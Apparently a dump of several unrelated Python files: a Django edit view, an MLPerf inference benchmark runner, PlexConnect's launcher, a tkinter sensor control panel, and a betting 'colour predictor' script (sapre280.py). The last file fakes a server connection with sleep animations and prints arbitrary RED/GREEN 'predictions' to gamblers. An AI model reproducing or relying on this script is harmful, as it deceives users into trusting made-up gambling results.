return self.success_message
def get_object(self):
return self.model.objects.get(pk=self.pk_url_kwarg)
def get_form_class(self):
name = self.model_name.capitalize()
try:
form_class_path = "idcops.forms.{}EditForm".format(name)
self.form_class = import_string(form_class_path)
except BaseException:
form_class_path = "idcops.forms.{}Form".format(name)
self.form_class = import_string(form_class_path)
return self.form_class
def get_form_kwargs(self):
kwargs = super(EditModelView, self).get_form_kwargs()
params = self.request.GET.dict()
mfields = [f.attname for f in self.opts.fields]
for k in params.keys():
if k in mfields:
kwargs.update({k: params[k]})
related_models = []
for f in self.opts.get_fields():
if isinstance(f, (models.ForeignKey, models.ManyToManyField)):
if f.related_model:
related_models.append(f.related_model)
if User in related_models:
kwargs.update({'user': self.request.user})
return kwargs
def form_valid(self, form):
form.instance.operator = self.request.user
if 'onidc' not in form.cleaned_data:
form.instance.onidc = self.request.user.onidc
d1 = form.initial
message = json.dumps(form.changed_data)
response = super(EditModelView, self).form_valid(form)
d2 = model_to_dict(construct_instance(form, self.object))
diffs = diff_dict(make_dict(d1), make_dict(d2))
content = json.dumps(diffs)
log_action(
user_id=self.request.user.pk,
content_type_id=get_content_type_for_model(self.object, True).pk,
object_id=self.object.pk,
action_flag="修改", message=message, content=content
)
if self.model_name == 'online':
verify = Thread(target=device_post_save, args=(self.object.pk,))
verify.start()
if self.request.is_ajax():
data = {
'message': "Successfully submitted form data.",
'data': form.cleaned_data
}
return JsonResponse(data)
else:
return response
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3]}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3]}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
DEFAULT_LATENCY = "0.100"
LATENCY_RESNET50 = "0.015"
LATENCY_MOBILENET = "0.010"
LATENCY_SSD_MOBILENET = "0.010"
# FIXME: change once final value is known
LATENCY_SSD_RESNET34 = "0.100"
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"queries-single": 1024,
"queries-multi": 24576,
"max-latency": DEFAULT_LATENCY,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"max-latency": LATENCY_RESNET50,
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"max-latency": LATENCY_RESNET50,
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"max-latency": LATENCY_MOBILENET,
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"max-latency": LATENCY_MOBILENET,
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"max-latency": LATENCY_SSD_MOBILENET,
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"max-latency": LATENCY_SSD_MOBILENET,
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"max-latency": LATENCY_SSD_MOBILENET,
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"max-latency": LATENCY_SSD_RESNET34,
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"max-latency": LATENCY_SSD_RESNET34,
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"max-latency": LATENCY_SSD_RESNET34,
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"max-latency": LATENCY_SSD_RESNET34,
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, list of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--queries-single", type=int, default=1024,
help="mlperf number of queries for SingleStream")
parser.add_argument("--queries-offline", type=int, default=24576,
help="mlperf number of queries for Offline")
parser.add_argument("--queries-multi", type=int, default=24576,
help="mlperf number of queries for MultiStream,Server")
parser.add_argument("--max-batchsize", type=int,
help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--qps", type=int, default=10, help="target qps estimate")
parser.add_argument("--max-latency", type=str, help="mlperf max latency in 99pct tile")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.max_latency:
args.max_latency = [float(i) for i in args.max_latency.split(",")]
try:
args.scenario = [SCENARIO_MAP[scenario] for scenario in args.scenario.split(",")]
except:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count = args.count
if not count:
if not args.accuracy:
count = 200
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
for scenario in args.scenario:
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries(): pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if scenario == lg.TestScenario.SingleStream:
settings.min_query_count = args.queries_single
settings.max_query_count = args.queries_single
elif scenario == lg.TestScenario.MultiStream:
settings.min_query_count = args.queries_multi
settings.max_query_count = args.queries_multi
settings.multi_stream_samples_per_query = 4
elif scenario == lg.TestScenario.Server:
max_latency = args.max_latency
elif scenario == lg.TestScenario.Offline:
settings.min_query_count = args.queries_offline
settings.max_query_count = args.queries_offline
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 1000), ds.load_query_samples, ds.unload_query_samples)
if scenario == lg.TestScenario.Server:
for target_latency in max_latency:
log.info("starting {}, latency={}".format(scenario, target_latency))
settings.server_target_latency_ns = int(target_latency * NANO_SEC)
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=os.path.dirname(args.output))
add_results(final_results, "{}-{}".format(scenario, target_latency),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
else:
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=os.path.dirname(args.output))
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open(args.output, "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
PlexConnect.py
|
#!/usr/bin/env python
"""
PlexConnect
Sources:
inter-process-communication (queue): http://pymotw.com/2/multiprocessing/communication.html
"""
import sys, time
from os import sep
import socket
from multiprocessing import Process, Pipe
from multiprocessing.managers import BaseManager
import signal, errno
import argparse
from Version import __VERSION__
import DNSServer, WebServer
import Settings, ATVSettings
from PILBackgrounds import isPILinstalled
from Debug import * # dprint()
CONFIG_PATH = '.'
def getIP_self():
cfg = param['CSettings']
if cfg.getSetting('enable_plexgdm')=='False':
dprint('PlexConnect', 0, "IP_PMS: "+cfg.getSetting('ip_pms'))
if cfg.getSetting('enable_plexconnect_autodetect')=='True':
# get public ip of machine running PlexConnect
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('1.2.3.4', 1000))
IP = s.getsockname()[0]
dprint('PlexConnect', 0, "IP_self: "+IP)
else:
# manual override from "settings.cfg"
IP = cfg.getSetting('ip_plexconnect')
dprint('PlexConnect', 0, "IP_self (from settings): "+IP)
return IP
# initializer for Manager, proxy-ing ATVSettings to WebServer/XMLConverter
def initProxy():
signal.signal(signal.SIGINT, signal.SIG_IGN)
procs = {}
pipes = {}
param = {}
running = False
def startup():
global procs
global pipes
global param
global running
# Settings
cfg = Settings.CSettings(CONFIG_PATH)
param['CSettings'] = cfg
# Logfile
if cfg.getSetting('logpath').startswith('.'):
# relative to current path
logpath = sys.path[0] + sep + cfg.getSetting('logpath')
else:
# absolute path
logpath = cfg.getSetting('logpath')
param['LogFile'] = logpath + sep + 'PlexConnect.log'
param['LogLevel'] = cfg.getSetting('loglevel')
dinit('PlexConnect', param, True) # init logging, new file, main process
dprint('PlexConnect', 0, "Version: {0}", __VERSION__)
dprint('PlexConnect', 0, "Python: {0}", sys.version)
dprint('PlexConnect', 0, "Host OS: {0}", sys.platform)
dprint('PlexConnect', 0, "PILBackgrounds: Is PIL installed? {0}", isPILinstalled())
# more Settings
param['IP_self'] = getIP_self()
param['HostToIntercept'] = cfg.getSetting('hosttointercept')
param['baseURL'] = 'http://'+ param['HostToIntercept']
# proxy for ATVSettings
proxy = BaseManager()
proxy.register('ATVSettings', ATVSettings.CATVSettings)
proxy.start(initProxy)
param['CATVSettings'] = proxy.ATVSettings(CONFIG_PATH)
running = True
# init DNSServer
if cfg.getSetting('enable_dnsserver')=='True':
master, slave = Pipe() # endpoint [0]-PlexConnect, [1]-DNSServer
proc = Process(target=DNSServer.Run, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['DNSServer'] = proc
pipes['DNSServer'] = master
else:
dprint('PlexConnect', 0, "DNSServer not alive. Shutting down.")
running = False
# init WebServer
if running:
master, slave = Pipe() # endpoint [0]-PlexConnect, [1]-WebServer
proc = Process(target=WebServer.Run, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['WebServer'] = proc
pipes['WebServer'] = master
else:
dprint('PlexConnect', 0, "WebServer not alive. Shutting down.")
running = False
# init WebServer_SSL
if running and \
cfg.getSetting('enable_webserver_ssl')=='True':
master, slave = Pipe() # endpoint [0]-PlexConnect, [1]-WebServer
proc = Process(target=WebServer.Run_SSL, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['WebServer_SSL'] = proc
pipes['WebServer_SSL'] = master
else:
dprint('PlexConnect', 0, "WebServer_SSL not alive. Shutting down.")
running = False
# not started successful - clean up
if not running:
cmdShutdown()
shutdown()
return running
def run(timeout=60):
# do something important
try:
time.sleep(timeout)
except IOError as e:
if e.errno == errno.EINTR and not running:
pass # mask "IOError: [Errno 4] Interrupted function call"
else:
raise
return running
def shutdown():
for slave in procs:
procs[slave].join()
param['CATVSettings'].saveSettings()
dprint('PlexConnect', 0, "Shutdown")
def cmdShutdown():
global running
running = False
# send shutdown to all pipes
for slave in pipes:
pipes[slave].send('shutdown')
dprint('PlexConnect', 0, "Shutting down.")
def sighandler_shutdown(signum, frame):
signal.signal(signal.SIGINT, signal.SIG_IGN) # we heard you!
cmdShutdown()
if __name__=="__main__":
signal.signal(signal.SIGINT, sighandler_shutdown)
signal.signal(signal.SIGTERM, sighandler_shutdown)
parser = argparse.ArgumentParser()
parser.add_argument('--config_path', metavar='<config_path>', required=False,
help='path of folder containing config files, relative to PlexConnect.py')
args = parser.parse_args()
if args.config_path:
CONFIG_PATH = args.config_path
dprint('PlexConnect', 0, "***")
dprint('PlexConnect', 0, "PlexConnect")
dprint('PlexConnect', 0, "Press CTRL-C to shut down.")
dprint('PlexConnect', 0, "***")
running = startup()
while running:
running = run()
shutdown()
|
main.py
|
import tkinter as tk
import threading
import sys
from tkinter import ttk
from tkinter import simpledialog
from page import Page
from homepage import Homepage
class Layout(tk.Frame):
def __init__(self, *args, **kwargs):
"""
This is initiation of Layout class which is main class of applicaction. It inheritates from tk.Frame class.
All app managment happens here, as well as buttons and functionalities shown independently of type of page
opened.
"""
tk.Frame.__init__(self, *args, **kwargs)
# Setting up two frames which are used all the time. The button frame is frame where all of the page buttons
# are placed. Container is rest of screen. Also, app is made to work properly only on FHD display.
self.button_frame = tk.Frame(self, height=40)
self.container = tk.Frame(self, height=1860)
self.button_frame.pack(anchor='nw', fill="both", expand=True)
self.container.pack(anchor='nw', fill="both", expand=True)
# x coord being the point from which page buttons start being placed.
self.page_but_x = 130
# Making instance of ttk.Style() is needed to manage some widgets form, such as text size or font type.
self.style = ttk.Style()
self.font = 'Segoe'
# Maximum update time applied for updating all the stuff, such as logs, graphs, data, etc.
self.update_time = 5000
# Setting up the homepage, which is an instance of Homepage class. Place it in 'container' at x=0 and y=0, which
# are actually x=0 and y=40 in whole screen.
self.homepage = Homepage(update_time=self.update_time)
self.homepage.place(in_=self.container, x=0, y=0, relwidth=1, relheight=1)
# Buffor with all pages instances.
self.pages = []
# Amount of MQTT clients, which actually is equivalent to amount of pages.
self.clients = 0
# Initiation of buttons, adding one page and showing homepage again.
self.buttons_init()
self.add_page()
self.homepage.show()
# Setting new thread. Thread is a process working independently in the background. With daemon set to True it
# the thread is killed when app is closed.
self.loop = threading.Thread(target=self.homepage_update, daemon=True)
self.loop.start()
def buttons_init(self):
"""
Declaring all buttons and placing them on the screen. These are buttons placed in buttonframe, so they are shown
all the time.
"""
self.buttons = []
self.style.configure('TButton', font=('Segoe', 10))
self.page_choose_entry_visible = False
self.homepage_button = ttk.Button(self.button_frame, text="Main panel", style='TButton', command=self.homepage.show)
self.add_page_button = ttk.Button(self.button_frame, text="Add", style='TButton', command=self.add_page)
self.delete_page_button = ttk.Button(self.button_frame, text="Delete", style='TButton', command=self.delete_page)
self.add_many_button = ttk.Button(self.button_frame, text="Add many", style='TButton', command=self.add_many)
self.delete_many_button = ttk.Button(self.button_frame, text="Delete many", style='TButton', command=self.delete_many)
self.delete_page_button.place(in_=self.button_frame, x=1850, y=10, width=60, height=30)
self.add_page_button.place(in_=self.button_frame, x=1790, y=10, width=60, height=30)
self.delete_many_button.place(in_=self.button_frame, x=1680, y=10, width=110, height=30)
self.add_many_button.place(in_=self.button_frame, x=1590, y=10, width=90, height=30)
self.homepage_button.place(in_=self.button_frame, x=10, y=10, width=110, height=30)
def homepage_update(self):
"""
Homepage update function. It checks if 'connect all' button on homepage was pressed. If it was, then it connects
with all devices declared on pages. 'Disconnect all' works analogically. Also, this function transmits data from
all the pages to the homepage. Thanks to that values from each Page instance can be manage in Homepage as well,
seperately.
"""
if self.homepage.connect_all_flag == True:
self.connect_all()
elif self.homepage.connect_all_flag == False:
self.disconnect_all()
self.homepage.connect_all_flag = None
for i in range(self.clients):
if self.pages[i].connected:
data = self.pages[i].get_recent_data()
if data != None:
self.homepage.data_update(data)
else:
continue
# Using tk.after function. It repeates declared function every declared time. Here it runs self.homepage_update
# every 2.5s. Thanks to running this function as a thread it is possible to use rest of app while this function
# runs.
self.home_update_after = self.after(int(self.update_time/2), self.homepage_update)
def connect_all(self):
""" Connect with all devices. """
for i in range(self.clients):
if self.pages[i].connected:
continue
else:
self.pages[i].connect()
self.pages[i].connected = True
def disconnect_all(self):
""" Disonnect with all devices. """
for i in range(self.clients):
if not self.pages[i].connected:
continue
else:
self.pages[i].disconnect()
self.pages[i].connected = False
def add_page(self):
""" Add page."""
self.clients += 1
page = Page(client_id=self.clients, update_time=self.update_time)
page.place(in_=self.container, x=0, y=0, relwidth=1, relheight=1)
self.pages.append(page)
button = ttk.Button(text=f"{self.clients}", style='TButton', command=self.pages[self.clients-1].show)
if self.clients <= 40:
button.place(in_=self.button_frame, x=self.page_but_x, y=10, width=30, height=30)
else:
self.show_page_choose_entry()
self.page_but_x += 30 + 2
self.buttons.append(button)
def show_page_choose_entry(self):
""" Show entry box responsible for getting page ID. At default it has client ID typed in. """
if not self.page_choose_entry_visible:
self.page_choose_entry_visible = True
self.entry = tk.StringVar()
self.id_choose_entry = ttk.Entry(self, textvariable=self.entry, font=(self.font, 11, 'normal'))
self.id_choose_button = ttk.Button(text='Open page', style='TButton',
command=self.show_page_by_num)
self.id_choose_button.place(x=1435, y=10, height=30, width=92)
self.id_choose_entry.place(x=1527, y=10.5, height=28, width=35)
self.entry.set(self.clients)
def show_page_by_num(self):
""" Show page by number typed in entrybox. """
try:
num = int(self.entry.get()) - 1
self.pages[num].show()
except IndexError:
pass
def hide_page_choose_entry(self):
""" Hide page choose entry box."""
self.page_choose_entry_visible = False
self.id_choose_button.place_forget()
self.id_choose_entry.place_forget()
def add_many(self):
""" Add many pages. It just runs add_page function declared amount of times. """
try:
amount = simpledialog.askstring(title="Add many", prompt="Amount of pages to add:")
for i in range(int(amount)):
self.add_page()
except:
return
def delete_page(self):
""" Delete page unless there is one left. """
if self.clients < 2:
return
else:
self.clients -= 1
if self.clients <= 40 and self.page_choose_entry_visible:
self.hide_page_choose_entry()
elif self.page_choose_entry_visible:
self.entry.set(self.clients)
self.pages[-1].delete()
self.pages = self.pages[:-1]
self.buttons[-1].place_forget()
self.buttons = self.buttons[:-1]
self.page_but_x -= 30 + 2
self.pages[self.clients-1].show()
def delete_many(self):
""" Delete many pages. It just runs delete_page function declared amount of times. """
try:
amount = simpledialog.askstring(title="Delete many", prompt="Amount of pages to delete:")
for i in range(int(amount)):
self.delete_page()
except:
return
def close(self):
""" Runs when app is closed. sys.exit() closes the app even after converting app to exe file. """
self.destroy()
sys.exit()
if __name__ == "__main__":
# Initiate tkinter window.
root = tk.Tk()
# Show window on full screen by default,
root.state('zoomed')
# Window is based on Layot class.
main = Layout(root)
# Pack the 'main' in root and basically fill whole screen with it.
main.pack(side="top", fill="both", expand=True)
# Set resolution of root as 1920x1080 and allow to resize, which is not recommended though.
root.wm_geometry("1920x1080")
root.resizable(width=True, height=True)
# Set title of window.
root.title('MAX30102 control panel')
# Define function which will be called when window will be closed.
root.protocol("WM_DELETE_WINDOW", main.close)
# Start tkinter mainloop of root declared.
root.mainloop()
|
sapre280.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
expirydate = datetime.date(2022, 1, 13 )
#expirydate = datetime.date(2021, 12, 30)
today=date.today()
def hero():
def chalo():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']) :
if done:
break
sys.stdout.write('\rconnecting to server for next colour--------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def chalo1():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rgetting the colour wait --------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
clear()
y=1
newperiod=period
banner='figlet Rxce 7.o '
thisway=[0,2,4,6,8,10,12,14,16,18,20]
thatway=[1,3,5,7,9,11,13,15,17,19]
numbers=[]
i=1
while(y):
clear()
system(banner)
print("Contact me on telegram @Hackmgk")
print("Enter" ,newperiod,"Price :")
current=input()
current=int(current)
chalo()
print("\n---------Successfully Connected to the server-----------")
chalo1()
print("\n---------Successfully got the colour -------------")
print('\n')
def getSum(n):
sum=0
for digit in str(n):
sum += int(digit)
return sum
if i in thisway:
m=getSum(current)
n=int(current)%10
if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
if current in numbers:
print(newperiod+1," : 💥🟢GREEN1🟢💥")
else:
print(newperiod+1," : 💥🔴RED2🔴💥")
else:
if current in numbers:
print(newperiod+1," : 💥🔴RED3🔴💥")
else:
print(newperiod+1," : 💥🟢GREEN4🟢💥")
if i in thatway:
m=getSum(current)+1
n=int(current)%10
if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
if current in numbers:
print(newperiod+1,": 💥💥🔴RED5🔴💥💥")
else:
print(newperiod+1,": 💥💥🔴RED6🔴💥💥")
else:
if current in numbers:
print(newperiod+1,": 💥💥🟢GREEN6🟢💥💥")
else:
print(newperiod+1,": 💥💥🔴RED7🔴💥💥")
i=i+1
newperiod+=1
numbers.append(current)
y=input("Do you want to play : Press 1 and 0 to exit \n")
